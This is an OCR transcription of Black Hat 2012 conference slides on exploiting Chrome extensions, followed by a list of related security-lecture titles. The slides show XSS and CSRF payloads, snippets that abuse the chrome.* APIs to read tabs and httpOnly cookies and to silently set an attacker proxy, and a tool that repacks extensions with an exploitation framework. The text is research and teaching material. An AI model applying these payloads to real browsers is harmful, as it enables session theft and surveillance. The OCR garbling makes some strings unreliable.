Advanced Chrome Extension Exploita5on Leveraging API Powers for the Be=er Evil. Kyle Kos Osborn Krzysztof Kotowicz
|
|
- Martin Skinner
- 5 years ago
- Views:
Transcription
1 Advanced Chrome Extension Exploita5on Leveraging API Powers for the Be=er Evil Kyle Kos Osborn Krzysztof Kotowicz 1
2 Please complete the Speaker Feedback Surveys. This will help speakers to improve and for Black Hat to make be>er decisions regarding content and presenters for future events. The newest version of this slidedeck and white paper is available at h=p://kyleosborn.com/bh2012
3 Introduc)on Krzysztof Kotowicz IT security consultant at SecuRing h=p://blog.kotowicz.net Kyle Osborn Informa5on Security Specialist at AppSec Consul5ng h=p://kyleosborn.com/ 3
4 Previous research Kyle Osborn, Ma/ Johansen Hacking Google ChromeOS (BH 2011) N. Carlini, A. Porter Felt, D. Wagner - UC Berkeley An EvaluaNon of the Google Chrome Extension Security Architecture h/p:// extensionvulnerabilines.pdf Krzysztof Kotowicz h/p://blog.kotowicz.net/2012/02/intro- to- chrome- addons- hacking.html 4
5 Plan Briefing Chrome extensions security 101 Abusing Chrome extensions Easy exploita5on Using XSS ChEF Workshops all of the above in prac5ce & more 5
6 CHROME EXTENSIONS SECURITY 6
7 Chrome extensions security Extensions are HTML5 applicanons packaged in signed.crx files chrome- extension://<id> URLs Have access to powerful API chrome.tabs chrome.history chrome.cookies chrome.proxy Permissions defined in manifest.json 7
8 Chrome extensions security Content script Can interact with page DOM isolated worlds for page JS / content script JS No access to chrome.* API 8
9 Chrome extensions security Background page Has access to chrome.* API Content scripts and background pages can only exchange messages 9
10 Chrome extensions security Currently, Chrome extension security is very reliant on the developer Wri5ng bad code is easy Giving extensions more permissions than necessary is easier Extensions suffer from common web vulnerabili)es 10
11 Chrome extensions security XSS: page DOM has a vector that is grabbed and executed by extension <link rel="alternate" type="application/rss+xml" title="hello <img src=x onerror='alert(1)'>" href="/rss.rss"> CSRF: Page directly requests extension URLs <iframe src="chrome- extension://<id>/pages/ subscribe.html?location=//evil/whitelist"></iframe> 11
12 Chrome extensions security Most commonly vulnerable RSS readers Note extensions Web Developer extensions 12
13 Chrome extensions security manifest.json Defines resources, permissions, name etc. v1 v2 insecure, but everyone uses it Secure Content- Security- Policy by default (no XSS!) Pages cannot access extension URLs (no CSRF!) Unpopular 26 out of top 1000 extensions Will be enforced in Q
14 Chrome extensions security InstallaIon Methods Chrome Web Store curated by Google.crx install from any website (prompts user) Chrome 21 makes off- store installs harder Drag & drop.crx to chrome://extensions Or use --enable-easy-off-store-extension-install flag MiTM not possible due to cer5ficate signing 14
15 ABUSING CHROME EXTENSIONS 15
16 Fingerprin)ng The simplest method Generate a list of known extension IDs, and bruteforce chrome- extension://id/ resources to discovered extensions use onerror/onload to check for existence hrp://blog.kotowicz.net/2012/02/intro- to- chrome- addons- hacking.html 16
17 CSRF - example Chrome Adblock Extension UI uses pages/subscribe.html pages/subscribe.html?loca5on=url will subscribe to new block list var queryparts = parseuri.parsesearch(document.location.search); //... Subscribe to a list BGcall("subscribe", {id: 'url:' + queryparts.location}); Can be called by any webpage <iframe src="chrome-extension://<id>/pages/ subscribe.html?location=//evil/whitelist"> 17
18 XSS - example Slick RSS + Slick RSS: Feed Finder simple injec5on loca5on (<link> tag 5tle) <link rel="alternate" type="application/rss+xml" title="hello <img src=x onerror='payload'>" href="/rss.rss"> 18
19 XSS - example 19
20 Leveraging XSS Vector in page => XSS in content script No access to chrome.* API Only chrome.extension.* But: e.g. chrome.extension.connect & chrome.extension.sendmessage to communicate chrome.extension.getbackgroundpage().eval( mwahahahahaaaaa! ) 20
21 EASY EXPLOITATION 21
22 Easy exploita)on alert(1) - Now what? Use an automated tool to pillage and plunder BeEF does a great job hooking into DOMs But Need a special tool designed to take advantage of Chrome extension APIs 22
23 Easy exploita)on Enter XSS ChEF (Chrome Extension ExploitaNon Framework) Designed from the ground up for exploi5ng extensions Fast (uses WebSockets) Preloaded with automated a=ack scripts 23
24 Easy exploita)on Monitor open tabs of vicdms Execute JS on every tab Extract HTML Read/write cookies Access localstorage Manipulate browser history Take screenshots of tabs Inject BeEF hooks / keyloggers 24
25 USING XSS CHEF 25
26 XSS ChEF Launching server $ php -v PHP (cli) (built: Jun :49:42) Copyright (c) The PHP Group Zend Engine v2.3.0, Copyright (c) Zend Technologies with Xdebug v2.2.0, Copyright (c) , by Derick Rethans $ php server.php 2>command.log XSS ChEF server by Krzysztof Kotowicz - kkotowicz at gmail dot com Usage: php server.php [port=8080] [host= ] Communication is logged to stderr, use php server.php [port] 2>log.txt :40:06 [info] Server created :40:06 ChEF server is listening on : :40:06 [info] [client :60431] Connected :40:06 [info] [client :60431] Performing handshake :40:06 [info] [client :60431] Handshake sent :40:06 New hook c from
27 XSS ChEF Console 27
28 XSS ChEF Hook code 28
29 XSS ChEF 29
30 XSS ChEF 30
31 XSS ChEF 31
32 API abuse chrome.tabs.query - gets access to all tabs URLs (even incognito!), dtles, documents etc. chrome.tabs.query({}, function(t) { log({type: 'report_tabs','result':t}); }); 32
33 API abuse chrome.tabs.executescript - global XSS on any tab chrome.tabs.executescript(null, { code:"alert(document.cookie)" }); 33
34 API abuse chrome.tabs.capturevisibletab chrome.tabs.capturevisibletab(null,null, function(data_url) { log({type:'recvscreenshot', url: data_url}); }); 34
35 API abuse chrome.cookies read/write cookies, even h=ponly chrome.cookies.getall({url: " cb); {"domain": ".google.com", "expirationdate": , "hostonly": false, "httponly": true, "name": "NID", "path": "/", "secure": false, "session": false, "storeid": "0", "value": "61=..." },... chrome.cookies.set({ url: ' name: 'test-chef', value: 'test-ok', secure: true, httponly: true, expirationdate: null, path: '/' }, cb); 35
36 API abuse chrome.proxy - silently change HTTP proxy! var evilproxy = { "mode": "fixed_servers", "rules": { "bypasslist": ["<local>","attacker_domain.com"], // EXCLUDE BACK CHANNEL FROM PROXY "singleproxy": { "host": "localhost", // ATTACKER PROXY IP "port": 8080, // ATTACKER PROXY PORT "scheme": "http" // ATTACKER PROXY SCHEME } } } chrome.proxy.settings.set({value: evilproxy, scope: 'regular'}, cb); 36
37 API abuse chrome.bookmarks - interact with bookmarks chrome.bookmarks.search("http", cb); {"dateadded": , "id": "123", "index": 0, "parentid": "21", "title": "GMail", "url": " 37
38 Pre- Workshop Info Requirements Latest version of XSS ChEF required (w/ dependencies) PHP 5.x + HTTP server, op5onally node.js unzip, curl Only heavily tested under OS X & Linux Chrome Selected extensions All links can be found on h=p://kos.io/bh
39 BREAK (THEN WORKSHOP) h/p://kos.io/bh
40 Workshop Part one: Exploitadon Discovery Automa5on Part two: Repacking Leveraging the human factor 40
41 Part one: Exploita)on Web Developer 41
42 Part one: Exploita)on Springpad Extension 42
43 Part one: Exploita)on Cookie Manager 43
44 Part one: Exploita)on Slick RSS Slick RSS: Feed Finder 44
45 Part one: Exploita)on Speed Dial 45
46 Part Two: Repacking Wanted to get MORE privileges Udlizes click- through- syndrome 46
47 Part Two: Repacking repacker-webstore.sh <ID> output.crx Unpacking... Injecting xsschef... Adding permissions... Saving... Done. Moving signed extension to output.crx 47
48 Please complete the Speaker Feedback Surveys. This will help speakers to improve and for Black Hat to make be>er decisions regarding content and presenters for future events. The newest version of this slidedeck and white paper is available at h=p://kyleosborn.com/bh2012
AN EVALUATION OF THE GOOGLE CHROME EXTENSION SECURITY ARCHITECTURE
AN EVALUATION OF THE GOOGLE CHROME EXTENSION SECURITY ARCHITECTURE Nicholas Carlini, Adrienne Porter Felt, David Wagner University of California, Berkeley CHROME EXTENSIONS CHROME EXTENSIONS servers servers
More informationChrome Extension Security Architecture
Chrome Extension Security Architecture Presenter: Jienan Liu Network, Intelligence & security Lab outline Chrome extension introduction Threats towards extension Chrome extension s security architecture
More informationCare & Feeding of Programmers: Addressing App Sec Gaps using HTTP Headers. Sunny Wear OWASP Tampa Chapter December
Care & Feeding of Programmers: Addressing App Sec Gaps using HTTP Headers Sunny Wear OWASP Tampa Chapter December Mee@ng 1 About the Speaker Informa@on Security Architect Areas of exper@se: Applica@on,
More informationHuman vs Artificial intelligence Battle of Trust
Human vs Artificial intelligence Battle of Trust Hemil Shah Co-CEO & Director Blueinfy Solutions Pvt Ltd About Hemil Shah hemil@blueinjfy.net Position -, Co-CEO & Director at BlueInfy Solutions, - Founder
More informationThe Evolution of Chrome Security Architecture. Huan Ren Director, Qihoo 360 Technology Ltd
The Evolution of Chrome Security Architecture Huan Ren Director, Qihoo 360 Technology Ltd Today s Chrome Architecture Browser GPU Sandbox Policy Renderer Extension Plug In History Initial version: multi-process,
More informationRKN 2015 Application Layer Short Summary
RKN 2015 Application Layer Short Summary HTTP standard version now: 1.1 (former 1.0 HTTP /2.0 in draft form, already used HTTP Requests Headers and body counterpart: answer Safe methods (requests): GET,
More informationCIS 4360 Secure Computer Systems XSS
CIS 4360 Secure Computer Systems XSS Professor Qiang Zeng Spring 2017 Some slides are adapted from the web pages by Kallin and Valbuena Previous Class Two important criteria to evaluate an Intrusion Detection
More informationComputer Security CS 426 Lecture 41
Computer Security CS 426 Lecture 41 StuxNet, Cross Site Scripting & Cross Site Request Forgery CS426 Fall 2010/Lecture 36 1 StuxNet: Overview Windows-based Worm First reported in June 2010, the general
More informationLecture Overview. IN5290 Ethical Hacking
Lecture Overview IN5290 Ethical Hacking Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks Universitetet i Oslo Laszlo Erdödi How to use Burp
More informationLecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks
IN5290 Ethical Hacking Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks Universitetet i Oslo Laszlo Erdödi Lecture Overview How to use Burp
More informationIronWASP (Iron Web application Advanced Security testing Platform)
IronWASP (Iron Web application Advanced Security testing Platform) 1. Introduction: IronWASP (Iron Web application Advanced Security testing Platform) is an open source system for web application vulnerability
More informationWeb basics: HTTP cookies
Web basics: HTTP cookies Myrto Arapinis School of Informatics University of Edinburgh February 11, 2016 1 / 27 How is state managed in HTTP sessions HTTP is stateless: when a client sends a request, the
More informationHow is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach
Web basics: HTTP cookies Myrto Arapinis School of Informatics University of Edinburgh March 30, 2015 How is state managed in HTTP sessions HTTP is stateless: when a client sends a request, the server sends
More informationWeb Application Penetration Testing
Web Application Penetration Testing COURSE BROCHURE & SYLLABUS Course Overview Web Application penetration Testing (WAPT) is the Security testing techniques for vulnerabilities or security holes in corporate
More informationSolutions Business Manager Web Application Security Assessment
White Paper Solutions Business Manager Solutions Business Manager 11.3.1 Web Application Security Assessment Table of Contents Micro Focus Takes Security Seriously... 1 Solutions Business Manager Security
More informationHTML5: Something wicked this way comes. Krzysztof Kotowicz Securing
HTML5: Something wicked this way comes Krzysztof Kotowicz Securing 1 About me security researcher HTML 5 UI redressing / clickjacking xss-track, squid-imposter,... pentester IT security trainer Hacking
More informationWHY CSRF WORKS. Implicit authentication by Web browsers
WHY CSRF WORKS To explain the root causes of, and solutions to CSRF attacks, I need to share with you the two broad types of authentication mechanisms used by Web applications: 1. Implicit authentication
More informationWriting Secure Chrome Apps and Extensions
Writing Secure Chrome Apps and Extensions Keeping your users safe Jorge Lucángeli Obes Software Engineer Keeping users safe A lot of work going into making browsers more secure What about users' data?
More informationWeb basics: HTTP cookies
Web basics: HTTP cookies Myrto Arapinis School of Informatics University of Edinburgh November 20, 2017 1 / 32 How is state managed in HTTP sessions HTTP is stateless: when a client sends a request, the
More informationAbusing Windows Opener to Bypass CSRF Protection (Never Relay On Client Side)
Abusing Windows Opener to Bypass CSRF Protection (Never Relay On Client Side) Narendra Bhati @NarendraBhatiB http://websecgeeks.com Abusing Windows Opener To Bypass CSRF Protection Narendra Bhati Page
More informationInformation Security CS 526 Topic 8
Information Security CS 526 Topic 8 Web Security Part 1 1 Readings for This Lecture Wikipedia HTTP Cookie Same Origin Policy Cross Site Scripting Cross Site Request Forgery 2 Background Many sensitive
More informationOWASP Thailand. Proxy Caches and Web Application Security. OWASP AppSec Asia October 21, Using the Recent Google Docs 0-Day as an Example
Proxy Caches and Web Application Security Using the Recent Google Docs 0-Day as an Example Tim Bass, CISSP Chapter Leader, Thailand +66832975101, tim@unix.com AppSec Asia October 21, 2008 Thailand Worldwide
More informationIntegrity attacks (from data to code): Malicious File upload, code execution, SQL Injection
Pattern Recognition and Applications Lab Integrity attacks (from data to code): Malicious File upload, code execution, SQL Injection Igino Corona igino.corona _at_ diee.unica.it Computer Security May 2nd,
More informationAn Evaluation of the Google Chrome Extension Security Architecture
An Evaluation of the Google Chrome Extension Security Architecture Nicholas Carlini, Adrienne Porter Felt, and David Wagner University of California, Berkeley nicholas.carlini@berkeley.edu, apf@cs.berkeley.edu,
More informationGUI based and very easy to use, no security expertise required. Reporting in both HTML and RTF formats - Click here to view the sample report.
Report on IRONWASP Software Product: IronWASP Description of the Product: IronWASP (Iron Web application Advanced Security testing Platform) is an open source system for web application vulnerability testing.
More informationMatch the attack to its description:
Match the attack to its description: 8 7 5 6 4 2 3 1 Attacks: Using Components with Known Vulnerabilities Missing Function Level Access Control Sensitive Data Exposure Security Misconfiguration Insecure
More informationCode-Reuse Attacks for the Web: Breaking XSS mitigations via Script Gadgets
Code-Reuse Attacks for the Web: Breaking XSS mitigations via Script Gadgets Sebastian Lekies (@slekies) Krzysztof Kotowicz (@kkotowicz) Eduardo Vela Nava (@sirdarckcat) Agenda 1. 2. 3. 4. 5. 6. Introduction
More informationWeb 2.0 and AJAX Security. OWASP Montgomery. August 21 st, 2007
Web 2.0 and AJAX Security OWASP Montgomery August 21 st, 2007 Overview Introduction Definition of Web 2.0 Basics of AJAX Attack Vectors for AJAX Applications AJAX and Application Security Conclusions 1
More information(System) Integrity attacks System Abuse, Malicious File upload, SQL Injection
Pattern Recognition and Applications Lab (System) Integrity attacks System Abuse, Malicious File upload, SQL Injection Igino Corona igino.corona (at) diee.unica.it Computer Security April 9, 2018 Department
More informationJOE WIPING OUT CSRF
JOE ROZNER @JROZNER WIPING OUT CSRF IT S 2017 WHAT IS CSRF? 4 WHEN AN ATTACKER FORCES A VICTIM TO EXECUTE UNWANTED OR UNINTENTIONAL HTTP REQUESTS WHERE DOES CSRF COME FROM? 6 SAFE VS. UNSAFE Safe GET HEAD
More informationWEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang
WEB SECURITY WORKSHOP TEXSAW 2014 Presented by Solomon Boyd and Jiayang Wang Introduction and Background Targets Web Applications Web Pages Databases Goals Steal data Gain access to system Bypass authentication
More informationCSC 482/582: Computer Security. Cross-Site Security
Cross-Site Security 8chan xss via html 5 storage ex http://arstechnica.com/security/2015/09/serious- imgur-bug-exploited-to-execute-worm-like-attack-on- 8chan-users/ Topics 1. Same Origin Policy 2. Credential
More informationCNIT 129S: Securing Web Applications. Ch 10: Attacking Back-End Components
CNIT 129S: Securing Web Applications Ch 10: Attacking Back-End Components Injecting OS Commands Web server platforms often have APIs To access the filesystem, interface with other processes, and for network
More informationWeb Application Security. Philippe Bogaerts
Web Application Security Philippe Bogaerts OWASP TOP 10 3 Aim of the OWASP Top 10 educate developers, designers, architects and organizations about the consequences of the most common web application security
More informationPROBLEMS IN PRACTICE: THE WEB MICHAEL ROITZSCH
Faculty of Computer Science Institute of Systems Architecture, Operating Systems Group PROBLEMS IN PRACTICE: THE WEB MICHAEL ROITZSCH THE WEB AS A DISTRIBUTED SYSTEM 2 WEB HACKING SESSION 3 3-TIER persistent
More informationNODE.JS SERVER SIDE JAVASCRIPT. Introduc)on Node.js
NODE.JS SERVER SIDE JAVASCRIPT Introduc)on Node.js Node.js was created by Ryan Dahl starting in 2009. For more information visit: http://www.nodejs.org 1 What about Node.js? 1. JavaScript used in client-side
More informationAttacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14
Attacks Against Websites 3 The OWASP Top 10 Tom Chothia Computer Security, Lecture 14 OWASP top 10. The Open Web Application Security Project Open public effort to improve web security: Many useful documents.
More informationW3Conf, November 15 & 16, Brad Scott
The Future of Web Application Security W3Conf, November 15 & 16, 2011 Brad Hill @hillbrad bhill@paypal-inc.com Scott Stender @scottstender scott@isecpartners.com The History of Web App Security Attacker
More informationJOE WIPING OUT CSRF
JOE ROZNER @JROZNER WIPING OUT CSRF IT S 2017 WHAT IS CSRF? 4 WHEN AN ATTACKER FORCES A VICTIM TO EXECUTE UNWANTED OR UNINTENTIONAL HTTP REQUESTS WHERE DOES CSRF COME FROM? LET S TALK HTTP SAFE VS. UNSAFE
More informationInformation Security CS 526 Topic 11
Information Security CS 526 Topic 11 Web Security Part 1 1 Readings for This Lecture Wikipedia HTTP Cookie Same Origin Policy Cross Site Scripting Cross Site Request Forgery 2 Background Many sensitive
More informationMWR InfoSecurity Advisory. 26 th April Elastic Path Administrative. Quit. Session Hijacking through Embedded XSS
Quit MWR InfoSecurity Advisory Elastic Path Administrative Session Hijacking through Embedded XSS 26 th April 2007 2007-04-26 1 of 7 INDEX 1 Detailed Vulnerability description...4 1.1 Introduction...4
More informationCode-Injection Attacks in Browsers Supporting Policies. Elias Athanasopoulos, Vasilis Pappas, and Evangelos P. Markatos FORTH-ICS
Code-Injection Attacks in Browsers Supporting Policies Elias Athanasopoulos, Vasilis Pappas, and Evangelos P. Markatos FORTH-ICS What is all about? New code-injection attacks or return-to-libc attacks
More informationOverview Cross-Site Scripting (XSS) Christopher Lam Introduction Description Programming Languages used Types of Attacks Reasons for XSS Utilization Attack Scenarios Steps to an XSS Attack Compromises
More informationWeb Penetration Testing
Web Penetration Testing What is a Website How to hack a Website? Computer with OS and some servers. Apache, MySQL...etc Contains web application. PHP, Python...etc Web application is executed here and
More informationOWASP AppSec Research The OWASP Foundation New Insights into Clickjacking
New Insights into Clickjacking Marco `embyte` Balduzzi iseclab @ EURECOM embyte@iseclab.org AppSec Research 2010 Joint work with Egele, Kirda, Balzarotti and Kruegel Copyright The Foundation Permission
More informationEasyCrypt passes an independent security audit
July 24, 2017 EasyCrypt passes an independent security audit EasyCrypt, a Swiss-based email encryption and privacy service, announced that it has passed an independent security audit. The audit was sponsored
More informationSecurity. CSC309 TA: Sukwon Oh
Security CSC309 TA: Sukwon Oh Outline SQL Injection NoSQL Injection (MongoDB) Same Origin Policy XSSI XSS CSRF (XSRF) SQL Injection What is SQLI? Malicious user input is injected into SQL statements and
More informationSome Facts Web 2.0/Ajax Security
/publications/notes_and_slides Some Facts Web 2.0/Ajax Security Allen I. Holub Holub Associates allen@holub.com Hackers attack bugs. The more complex the system, the more bugs it will have. The entire
More informationAttacks Against Websites. Tom Chothia Computer Security, Lecture 11
Attacks Against Websites Tom Chothia Computer Security, Lecture 11 A typical web set up TLS Server HTTP GET cookie Client HTML HTTP file HTML PHP process Display PHP SQL Typical Web Setup HTTP website:
More informationApplication Security Introduction. Tara Gu IBM Product Security Incident Response Team
Application Security Introduction Tara Gu IBM Product Security Incident Response Team About Me - Tara Gu - tara.weiqing@gmail.com - Duke B.S.E Biomedical Engineering - Duke M.Eng Computer Engineering -
More informationCSCE 813 Internet Security Case Study II: XSS
CSCE 813 Internet Security Case Study II: XSS Professor Lisa Luo Fall 2017 Outline Cross-site Scripting (XSS) Attacks Prevention 2 What is XSS? Cross-site scripting (XSS) is a code injection attack that
More informationUser Interaction: jquery
User Interaction: jquery Assoc. Professor Donald J. Patterson INF 133 Fall 2012 1 jquery A JavaScript Library Cross-browser Free (beer & speech) It supports manipulating HTML elements (DOM) animations
More informationClient Side Security And Testing Tools
OWASP Jakarta Tech Day Meetup 2017 Client Side Security And Testing Tools David Cervigni @ Minded Security Agenda Short Intro Client side threats: Why important/difficult Examples: Dom XSS, HTTP Param
More informationContent Security Policy
About Tim Content Security Policy New Tools for Fighting XSS Pentester > 10 years Web Applications Network Security Products Exploit Research Founded Blindspot Security in 2014 Pentesting Developer Training
More informationCommon Websites Security Issues. Ziv Perry
Common Websites Security Issues Ziv Perry About me Mitnick attack TCP splicing Sql injection Transitive trust XSS Denial of Service DNS Spoofing CSRF Source routing SYN flooding ICMP
More informationExtending the browser to secure applications
Extending the browser to secure applications Highlights from W3C WebAppSec Group Deian Stefan Modern web apps have many moving pieces & parties Application code & content itself User provided content (e.g.,
More informationRBS NetGain Enterprise Manager Multiple Vulnerabilities of 11
RBS-2018-004 NetGain Enterprise Manager Multiple Vulnerabilities 2018-03-22 1 of 11 Table of Contents Vendor / Product Information 3 Vulnerable Program Details 3 Credits 3 Impact 3 Vulnerability Details
More informationFor Bitcoins and Bounties James Kettle
EXPLOITING CORS MISCONFIGURATIONS For Bitcoins and Bounties James Kettle A MORAL STORY WeBuy0day Internal team of security experts Users are all security experts Easily fenced intellectual property Trivial
More informationThe security of Mozilla Firefox s Extensions. Kristjan Krips
The security of Mozilla Firefox s Extensions Kristjan Krips Topics Introduction The extension model How could extensions be used for attacks - website defacement - phishing attacks - cross site scripting
More informationWeb Security. Thierry Sans
Web Security Thierry Sans 1991 Sir Tim Berners-Lee Web Portals 2014 Customer Resources Managemen Accounting and Billing E-Health E-Learning Collaboration Content Management Social Networks Publishing Web
More informationPreparing for the Cross Site Request Forgery Defense
Preparing for the Cross Site Request Forgery Defense By Chuck Willis chuck.willis@mandiant.com Presented at Black Hat Briefings DC 2008 on February 20, 2008 Slides available at www.blackhat.com. Abstract:
More informationWeb Security IV: Cross-Site Attacks
1 Web Security IV: Cross-Site Attacks Chengyu Song Slides modified from Dawn Song 2 Administrivia Lab3 New terminator: http://www.cs.ucr.edu/~csong/sec/17/l/new_terminator Bonus for solving the old one
More informationLecture Overview. IN5290 Ethical Hacking. Lecture 4: Web hacking 1, Client side bypass, Tampering data, Brute-forcing
Lecture Overview IN5290 Ethical Hacking Lecture 4: Web hacking 1, Client side bypass, Tampering data, Brute-forcing Summary - how web sites work HTTP protocol Client side server side actions Accessing
More informationCertified Secure Web Application Engineer
Certified Secure Web Application Engineer ACCREDITATIONS EXAM INFORMATION The Certified Secure Web Application Engineer exam is taken online through Mile2 s Assessment and Certification System ( MACS ),
More informationOctober 08: Introduction to Web Security
October 08: Introduction to Web Security Scribe: Rohan Padhye October 8, 2015 Web security is an important topic because web applications are particularly hard to secure, and are one of the most vulnerable/buggy
More informationAdvanced CSRF and Stateless at OWASP AppSec Research 2012
Advanced CSRF and Stateless Anti-CSRF @johnwilander at OWASP AppSec Research 2012 Frontend developer at Svenska Handelsbanken Researcher in application security Co-leader OWASP Sweden @johnwilander johnwilander.com
More informationSurrogate Dependencies (in
Surrogate Dependencies (in NodeJS) @DinisCruz London, 29th Sep 2016 Me Developer for 25 years AppSec for 13 years Day jobs: Leader OWASP O2 Platform project Application Security Training JBI Training,
More informationClient Side Injection on Web Applications
Client Side Injection on Web Applications Author: Milad Khoshdel Blog: https://blog.regux.com Email: miladkhoshdel@gmail.com 1 P a g e Contents INTRODUCTION... 3 HTML Injection Vulnerability... 4 How to
More informationCSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis
CSE361 Web Security Attacks against the client-side of web applications Nick Nikiforakis nick@cs.stonybrook.edu Despite the same origin policy Many things can go wrong at the client-side of a web application
More informationCOMP9321 Web Application Engineering
COMP9321 Web Application Engineering Semester 2, 2017 Dr. Amin Beheshti Service Oriented Computing Group, CSE, UNSW Australia Week 9 http://webapps.cse.unsw.edu.au/webcms2/course/index.php?cid=2465 1 Assignment
More informationAttacking Mobile Broadband Modems Like A Criminal Would. Andreas IT-SeCX 2014
Attacking Mobile Broadband Modems Like A Criminal Would Andreas Lindh, @addelindh, IT-SeCX 2014 whoami Security Analyst with I Secure Sweden Technical generalist Not really an expert on anything I like
More informationANZTB SIGIST May 2011 Perth OWASP How minor vulnerabilities can do very bad things. OWASP Wednesday 25 th May The OWASP Foundation
ANZTB SIGIST May 2011 Perth OWASP How minor vulnerabilities can do very bad things Christian Frichot / David Taylor (Some of) Perth OWASP s Chapter Leads OWASP Wednesday 25 th May 2011 Copyright The OWASP
More informationAttacking the Application OWASP. The OWASP Foundation. Dave Ferguson, CISSP Security Consultant FishNet Security.
Attacking the Application Dave Ferguson, CISSP Security Consultant FishNet Security Copyright The Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the
More informationIs Browsing Safe? Web Browser Security. Subverting the Browser. Browser Security Model. XSS / Script Injection. 1. XSS / Script Injection
Is Browsing Safe? Web Browser Security Charlie Reis Guest Lecture - CSE 490K - 5/24/2007 Send Spam Search Results Change Address? Install Malware Web Mail Movie Rentals 2 Browser Security Model Pages are
More informationMulti-Post XSRF Web App Exploitation, total pwnage
Multi-Post XSRF Web App Exploitation, total pwnage Adrien de Beaupré SANS ISC Handler Tester of pens Certified SANS Instructor Intru-Shun.ca Inc. SecTor 2015 Introduction Web application vulnerabilities.
More informationlast time: command injection
Web Security 1 last time: command injection 2 placing user input in more complicated language SQL shell commands input accidentally treated as commands in language instead of single value (e.g. argument/string
More informationCS 161 Computer Security
Nick Weaver Fall 2018 CS 161 Computer Security Homework 3 Due: Friday, 19 October 2018, at 11:59pm Instructions. This homework is due Friday, 19 October 2018, at 11:59pm. No late homeworks will be accepted
More informationPenetration Test Report
Penetration Test Report Feb 12, 2018 Ethnio, Inc. 6121 W SUNSET BLVD LOS angeles, CA 90028 Tel (888) 879-7439 ETHN.io Summary This document contains the most recent pen test results from our third party
More informationJohn Coggeshall Copyright 2006, Zend Technologies Inc.
PHP Security Basics John Coggeshall Copyright 2006, Zend Technologies Inc. Welcome! Welcome to PHP Security Basics Who am I: John Coggeshall Lead, North American Professional Services PHP 5 Core Contributor
More informationCHAPTER 8 CONCLUSION AND FUTURE ENHANCEMENTS
180 CHAPTER 8 CONCLUSION AND FUTURE ENHANCEMENTS 8.1 SUMMARY This research has focused on developing a Web Applications Secure System from Code Injection Vulnerabilities through Web Services (WAPS-CIVS),
More informationMetasploit. Installation Guide Release 4.4
Metasploit Installation Guide Release 4.4 TABLE OF CONTENTS About this Guide Target Audience...1 Organization...1 Document Conventions...1 Support...2 Support for Metasploit Pro and Metasploit Express...2
More informationIntroduction to Ethical Hacking
Introduction to Ethical Hacking Summer University 2017 Seoul, Republic of Korea Alexandre Karlov Today Some tools for web attacks Wireshark How a writeup looks like 0x04 Tools for Web attacks Overview
More informationCookie Security. Myths and Misconceptions. David Johansson OWASP London 30 Nov. 2017
Cookie Security Myths and Misconceptions David Johansson OWASP London 30 Nov. 2017 About Me David Johansson (@securitybits) Security consultant with 10 years in AppSec Helping clients design and build
More informationMavituna Security Ltd. Finance House, 522A Uxbridge Rd. Pinner. HA5 3PU / UK
Netsparker is the first false positive free scanner. In this document you can see the details of features, how to use them and how to tweak Netsparker. If you can t find what you are looking for, please
More informationNeat tricks to bypass CSRF-protection. Mikhail
Neat tricks to bypass CSRF-protection Mikhail Egorov @0ang3el About me AppSec Engineer @ Ingram Micro Cloud Bug hunter & Security researcher Conference speaker https://www.slideshare.net/0ang3el @0ang3el
More informationTaking White Hats to the Laundry: How to Strengthen Testing in Common Criteria
Taking White Hats to the Laundry: How to Strengthen Testing in Common Criteria Apostol Vassilev, Principal Consultant September 23,2009. Product Testing in Common Criteria Product Testing in Common Criteria
More informationOWASP TOP 10. By: Ilia
OWASP TOP 10 By: Ilia Alshanetsky @iliaa ME, MYSELF & I PHP Core Developer Author of Guide to PHP Security Security Aficionado WEB SECURITY THE CONUNDRUM USABILITY SECURITY YOU CAN HAVE ONE ;-) OPEN WEB
More informationWeb Security: Vulnerabilities & Attacks
Computer Security Course. Web Security: Vulnerabilities & Attacks Type 2 Type 1 Type 0 Three Types of XSS Type 2: Persistent or Stored The attack vector is stored at the server Type 1: Reflected The attack
More informationWeb Architecture Review Sheet
Erik Wilde (School of Information, UC Berkeley) INFO 190-02 (CCN 42509) Spring 2009 May 11, 2009 Available at http://dret.net/lectures/web-spring09/ Contents 1 Introduction 2 1.1 Setup.................................................
More informationWeb Application Attacks
Web Application Attacks What can an attacker do and just how hard is it? By Damon P. Cortesi IOActive, Inc. Comprehensive Computer Security Services www.ioactive.com cortesi:~
More informationTop 10 Web Application Vulnerabilities
Top 10 Web Application Vulnerabilities Why you should care about them plus a live hacking demo!! Why should you care?! Insecure so*ware is undermining our financial, healthcare, defense, energy, and other
More information,
Weekdays:- 1½ hrs / 3 days Fastrack:- 1½hrs / Day [Class Room and Online] ISO 9001:2015 CERTIFIED ADMEC Multimedia Institute www.admecindia.co.in 9911782350, 9811818122 Welcome to one of the highly professional
More informationSCALE 15x (c) 2017 Ty Shipman
Please view my linked-in page (under See more) to get a copy of this presenta
More informationCSE 484 / CSE M 584: Computer Security and Privacy. Web Security. Autumn Tadayoshi (Yoshi) Kohno
CSE 484 / CSE M 584: Computer Security and Privacy Web Security Autumn 2018 Tadayoshi (Yoshi) Kohno yoshi@cs.washington.edu Thanks to Dan Boneh, Dieter Gollmann, Dan Halperin, Ada Lerner, John Manferdelli,
More informationXSSFor the win! What can be really done with Cross-Site Scripting.
XSSFor the win! What can be really done with Cross-Site Scripting by @brutelogic Whoami Security Researcher at Sucuri Security (a GoDaddy company) XSS, filter/waf bypass and bash! Helped to fix more than
More informationFIREFOX MENU REFERENCE This menu reference is available in a prettier format at
FIREFOX MENU REFERENCE This menu reference is available in a prettier format at http://support.mozilla.com/en-us/kb/menu+reference FILE New Window New Tab Open Location Open File Close (Window) Close Tab
More informationCSCD 303 Essential Computer Security Fall 2018
CSCD 303 Essential Computer Security Fall 2018 Lecture 17 XSS, SQL Injection and CRSF Reading: See links - End of Slides Overview Idea of XSS, CSRF and SQL injection is to violate security of Web Browser/Server
More informationWeb Attacks CMSC 414. September 25 & 27, 2017
